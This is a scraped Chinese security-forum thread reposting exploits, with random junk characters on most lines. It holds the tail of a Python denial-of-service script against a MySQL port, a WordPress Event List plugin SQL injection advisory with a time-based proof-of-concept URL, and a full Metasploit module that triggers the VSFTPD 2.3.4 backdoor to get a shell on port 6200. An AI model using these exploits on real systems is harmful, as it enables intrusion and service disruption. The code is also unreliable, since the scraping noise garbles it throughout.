    2 ~8 I: y3 `# S" G$ F6 ^5 ~2 E ! {: e0 {8 l2 `/ G
    def main():* P( ]# o) `2 o. h! ~
    if len(sys.argv) != 2:
    . M$ @* m  `5 l" I) `3 B* Dusage()
    - l  ]; N/ o; z- C5 B9 ?# _sys.exit(); @' Q+ w0 g" U0 M
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ' G$ M5 |6 K$ `  B" d7 I 2 e, J* V: J$ `" H' T
    HOST = sys.argv[1]6 w5 F* T: t% x! w7 V0 |! W
    PORT = int(3306)4 n) Q6 N" Y" m( V% y
    s.connect((HOST,PORT))  ]5 ]# Z) A4 ?$ F& g
    print "
  • Connect"4 S+ L4 p  p: L7 I3 P4 _
    s.send(buf)0 K0 z  y  f2 S& n
    print "
  • Payload 1 sent"0 F. N( Y0 C+ b
    s.send(buf2)
    ! l) }3 Q, P  _' R5 Dprint "
  • Payload 2 sent
    , B& x) y3 u' r% D", "
  • Run again to ensure it is down..
    1 O. {, h$ v- a6 E9 g"
      Z8 ~! }: v# Z7 `s.close()
    ! V6 b; G( [8 F4 O% E( Y
    9 F) z" u1 a/ r1 g! i8 E4 }if __name__ == "__main__":/ M; A4 c+ c1 d- ?0 S
    main()
    : w% Z2 k/ m; U6 R# g( \( z. a5 {# h

    7 W% A5 P- Z; C  X% b) b5 p* d5 J* m* P; P) c& a

    + ]; ?  A- W" u& ?! b( H9 }* I- N% T0 t

    1 P- f  y4 |  I' M6 `8 N7 y- J: n2 W/ M0 m
    5 n# D0 `. l; ~2 n; P

    5 k! {4 U0 u8 |  i. j; L, T, c. t
    * z% u( v8 _7 h5 V/ u& y% p
    3 K" U2 T, V3 h2 e" {, }7 R# v) ?$ b  E
    , r/ e- \2 J( J7 e9 N0 o$ J9 W( q# ~
    ! h6 ?7 O6 I; A% C' I
    ; n1 m% Q. q' u
    % L( S& J" i; Z! O0 n* S& z: B) M1 w2 w/ b

    9 \3 e: O6 i7 h! h) @$ L9 C4 E+ f0 I9 k" v: X& l; K0 x" K0 q* w- {
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:6 r- N; R! j  ]! y
      
    2 C) R( P7 w4 Q7 i& W     
    , C) ^9 |% L6 ^  2 {9 Q: z1 B* g/ w
    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress6 B, Y5 H  G$ E" ^+ A
    allows an authenticated user to execute arbitrary SQL commands via the id! r6 C4 Z% c/ H+ q, A
    parameter to wp-admin/admin.php.
    9 v! O3 F) [- b+ q$ B$ r+ ?9 u% S3 ]  
    ; p9 G5 ]3 C5 x. G! R/ S   
    % D* e2 v5 Y: j& S4 T  
    & k  }+ v( r! T2 o2 [, Z+ L2. Proof of Concept:
    0 o' j. p7 X( I9 k  V; g( J  
    & K( }1 M9 X! M# m   & k/ `/ h, m: t7 ~4 v* y0 @
      
    ( k1 l' y; q: m0 ^+ chttp://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id
    5 J! ~# P2 D9 \! n' D=1 AND SLEEP(10)
    # \5 c4 z: W5 w, l$ I* m. |8 K2 r) G( Q
      
    , q. K% f& n; H" |  x2 z5 L$ E$ o) b   3 ~5 _$ `4 c: K2 T6 [- g9 @
      
    8 S5 u5 ?3 i! y, Y* h$ j3. Solution:
    % C5 O8 q4 t: Q% u  
    5 [: ~5 w+ M7 F$ h$ c7 k. `& z     + y/ b0 w% v9 A" g7 H2 ]
      * g1 z) |  X  p; T
    The plugin has been removed from WordPress. Deactivate the plug-in and wait) `* i1 ^" g0 F* }. P  E* A
    for a hotfix.
    + F' Z3 o! |4 i, P. p9 |& }7 p  - v5 Z$ H+ t4 Y" q- ^
       - e7 ]4 c  ?4 |- {9 {
      1 A8 C# n" Z2 |" }  s) O4 l
    4. Reference:
    2 s3 U- q# N- Y  g/ ~# K! L9 s  
    7 M6 G! \( `6 L5 Q   3 V( h- b) {. S$ w. g
      , C! g" I! u2 `. e/ s( I  c2 D
    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje2 H1 C/ v4 d4 K, Y) N3 ]: d
    ction-sqli/
    3 L$ z" h) k& K! }/ l+ s  
    6 U3 v' H, `' d+ G$ G$ o. Phttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429( G3 [) G4 E9 x3 d* u1 f% ^

    5 Y1 q) O% Q0 O( W# R! y6 w% ~) l- s/ i$ ^

    ) j3 z" H/ a* r! }/ Z
    6 S5 y( q. Y, \- }* {6 W& c7 F& r3 U# I4 P9 h# S2 M
    9 i" _( y6 }+ x& \

    - o7 O* ]% O& |% o& K" s3 H( x6 Z7 f9 e- `  C1 ?5 G
    8 n1 x" D$ ^0 j2 N* e9 n
      |! o/ K) U& b

    0 t  \  d: g; ]8 O& S" b! d& r
    ' O: t" l- ?- }/ e7 i% U6 x! V% b" _0 r+ d4 I/ \5 Y6 ~( P$ e7 D

    $ G' E$ v/ P& M" G; u5 m' n* W" H' i1 G
      j; f2 R9 J' t& @: h

    5 r7 C  M5 Y4 H/ W% C- e! j
      _5 `. B8 o: S& d8 C公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################4 _# C3 _2 P* k* k

    9 Y% B$ {( W# M0 M8 q$ y; }1 X* ]2 |5 L
    - I; w) a+ d4 d- M4 H
    require msf/core
    ' c. {4 s+ V. o% b; g4 x/ C) Y. F+ }( }
    class Metasploit3 < Msf::Exploit::Remote6 t; R% M# W3 w7 r! ?" p! ^
    Rank = ExcellentRanking
    - `$ r' r' c$ E3 \/ v8 Y& u$ ~
    9 g7 c, k8 @1 O6 B* kinclude Msf::Exploit::Remote::Tcp
    # y3 {, v2 b  F3 [  [$ t0 [- z$ o  v3 _
    def initialize(info = {})
    + \/ H: ^5 T0 q* Fsuper(update_info(info
    7 v- z4 f0 K5 RName => VSFTPD v2.3.4 Backdoor Command Execution7 [5 r, B* l3 F2 j! P  e  ~
    Descript_ion => %q{5 N; d( {' G9 D% m& y( L
    This module exploits a malicious backdoor that was added to the VSFTPD download# N% D0 x! A! r' A# e
    archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
    / Q1 b2 g! m- t; gJune 30th 2011 and July 1st 2011 according to the most recent information
    4 H( R2 L3 d, t7 v2 Javailable. This backdoor was removed on July 3rd 2011.# \6 G" p0 a6 W# i5 r" X7 S2 ^6 Y
    }0 {9 ]$ t* \8 _2 k& _
    Author => [ hdm mc ]# A! k! Z) G0 s; n/ t. a
    License => MSF_LICENSE6 ^+ T1 T, f6 m7 q+ X$ a8 c
    Version => $Revision: 13099 $( C0 n: y( J2 i( r+ E
    References =>4 c6 `! g& j! u- p
    [+ f9 E7 _# w" t; q2 n
    [ URL http://pastebin.com/AetT9sS5]$ N! k: b1 S6 W
    [ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
    6 @% F/ ~6 s/ a; _# _  y8 I]
    9 w' C$ W9 _. j* U* k' lPrivileged => true5 W- {6 q/ h/ m7 h5 G# D
    Platform => [ unix ]
    / O  T- _- f! A: `6 }: tArch => ARCH_CMD3 g1 _( q, `$ Q* S; M, T
    Payload =>
    ( W% h& B$ H7 r* u/ y2 ?6 f{
    # _% s' Q- J. H+ XSpace => 20005 n" A3 s# C" f) q. ]
    BadChars =>
    6 K6 ~. S% v  j) SDisableNops => true
    4 f* @  S: L3 _Compat =>3 M1 {2 }) d, H  R3 u8 ], H' J/ L
    {- m- U( k  g# w/ U% z) k. B
    PayloadType => cmd_interact* v9 a5 b. }" H
    ConnectionType => find. o! T2 O2 h; k; y" m7 J: U
    }
    9 W# v8 [# v5 ?0 k! Q}) B9 S  @0 l) P8 r
    Targets =>. C0 e2 F# b+ ^  d
    [7 p# N) m) b: j$ I: K$ Q
    [ Automatic { } ]- y8 |1 R/ N  r) k! H4 q3 ]+ x2 F9 y
    ]
    # |" O8 h: M7 p& m% i* W5 m- uDisclosureDate => Jul 3 2011
    ) R, S( `, l" S) fDefaultTarget => 0))' n& c: W8 g- V" P. z, f
    - L1 U* M$ K! i9 a: J+ P* n! Q
    register_options([ Opt::RPORT(21) ] self.class)
    $ E) g' G: d/ n3 |: Oend
    2 X2 H# f  D' p+ v+ {+ D
    % Y: F' ?7 ?" S/ d3 N3 }def exploit/ {( {  ]: |+ j$ H
    & Q. G4 ]9 J4 I. N
    nsock = self.connect(false {RPORT => 6200}) rescue nil
    $ Z! {- m2 G; d& \/ U( }" eif nsock
    3 x8 X$ t3 U, uprint_status(The port used by the backdoor bind listener is already open)
    % h0 k) @% Q1 Z, Y  `handle_backdoor(nsock)6 o- |0 [& L5 t) K
    return
    . i3 [$ b# k& n5 z% Uend! F, e% i- L) _" T0 E) h) r
    3 b$ z( C8 a# D( ~( W
    # Connect to the FTP service port first
    5 ]( i" T& b3 z. ~9 Y" Bconnect
    " \( M7 |1 S& \/ |7 A3 v  M% m4 F/ p8 a" `; u
    banner = sock.get_once(-1 30).to_s
    / c2 W  K1 C$ H: [) e, t; fprint_status(Banner: #{banner.strip})
    $ X8 _. F: m6 C& K1 V
    : N9 l# Z; l3 `. y1 w; ?2 |sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)+ |# Q8 n/ F$ _
    )/ Z" T2 t; A. p) E9 K; m
    resp = sock.get_once(-1 30).to_s' ~; t2 D( H1 k. @$ m5 K+ y: d
    print_status(USER: #{resp.strip})$ i) K, W' j8 O. i& d
    $ M/ `. u: B5 E# m& u) K+ S0 t3 Q
    if resp =~ /^530 /5 i' {+ U6 \9 o/ f
    print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
    : @( K3 R+ ]+ f1 odisconnect" G( g; t, X8 e6 a  ]( u( s" b# k# Z1 @) d
    return! X, F/ J9 k; I0 S, t* u; t
    end
    7 l: \( V% A, n, p% l
    2 v& D( I9 p, r& X1 Aif resp !~ /^331 /& d% S" F- i, _+ y6 v1 N
    print_error(This server did not respond as expected: #{resp.strip})/ T" C/ K' _3 u& d/ V" K. p
    disconnect
    , o. M# \; I4 Nreturn
    . r7 O1 g3 y. T$ k" mend: o5 z2 d  a" u% E" v

    ! p% u4 ^5 ~$ e  p' _6 O% csock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}4 @0 X; p; Y) y
    )$ P5 s& ?8 t1 Q# s" I5 R
    $ o4 f1 D; A) [/ ~6 s
    # Do not bother reading the response from password just try the backdoor9 B- C6 j; S+ r" J) E6 A/ h8 G: ?
    nsock = self.connect(false {RPORT => 6200}) rescue nil: t% [6 P' Z# M3 ~  Z) L
    if nsock
    + [' R9 d2 ^- O& ^# ^# _8 P9 l% tprint_good(Backdoor service has been spawned handling...)
    3 ~1 p. |) r: |9 xhandle_backdoor(nsock)# B* K% s' f& m0 ^
    return
    % m+ Q8 Q7 h* E, P+ Pend- d' [) G; O3 G& n7 m

    - j; @0 W) W7 m' `7 Pdisconnect0 a& [0 }" s0 y, @% P

    " e& Y: C  m6 a# j' k2 rend
    " K$ |6 x; G  R. J! ~5 l
    6 v1 y: d2 s7 B: t8 F% Wdef handle_backdoor(s)5 C" e3 S( K  E( H7 G: g; Y
      t$ {6 K8 w! S7 `
    s.put(id0 s- x, D8 V' D, j6 m
    )& ~( o3 h2 z- \4 X& w! u
    6 E4 \0 V: t  g  ?( N0 h3 R
    r = s.get_once(-1 5).to_s4 ]' x* w% p  r6 w: w7 y
    if r !~ /uid=/! B- @' N, Q# T/ J' }7 p8 L
    print_error(The service on port 6200 does not appear to be a shell)4 A+ `7 J! n% q7 s
    disconnect(s). [8 D9 ~* M1 P$ c- M9 Y- Q0 }
    return
    5 ~, b! w. n# Y8 kend
    ' D& q' P* u6 x+ {  x5 g! A8 h/ b; M5 g$ s+ N! X4 q9 K6 S
    print_good(UID: #{r.strip})
    0 ~$ {% v! J; c: F) ]) k8 \: q; m3 }) {
      f$ i- T$ ~' k( n) _s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1): I4 v0 i+ y4 W- Q7 p8 ~
    handler(s)+ ^4 d4 v$ M2 a- Q, O3 C) ^
    end0 S: D' f7 t5 v6 @/ ]# I5 q

    2 Z& S( N8 G* ^) ^" q2 y3 x! eend复制代码
    : o; u1 i( B2 ~2 p: E) s5 `! U& m7 Z

    # v* r# N& n) {2 S, Q
    - u1 p6 w0 @3 j- U6 Z; A- h8 w8 ?6 @
    8 a% q0 t- m# Z# F+ D: N$ x5 l4 y, B: X4 \  m$ r: T8 I4 X; Y* C
    ! Z+ C6 h6 O, }5 l! E. t
    7 P  n' S$ m# u
    2 w( u" g2 a& _# G/ ?& o

    - V( V/ E3 \0 p' p: i  k2 y' v1 Y5 D# X. j

    8 N, ]9 ~9 ]1 |- a0 @8 }( g! m; g9 t0 ^+ F+ t( c) P+ b# M
    . l) Z" [! T( X# p$ ^

    & @7 V8 b2 G( q9 Z2 v
    / [6 w, Z& J' H; J4 |& H# D- c" G) }
    : [5 t) X1 N, _$ s$ m
    1 p$ C9 n/ o) e& F' L  L
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表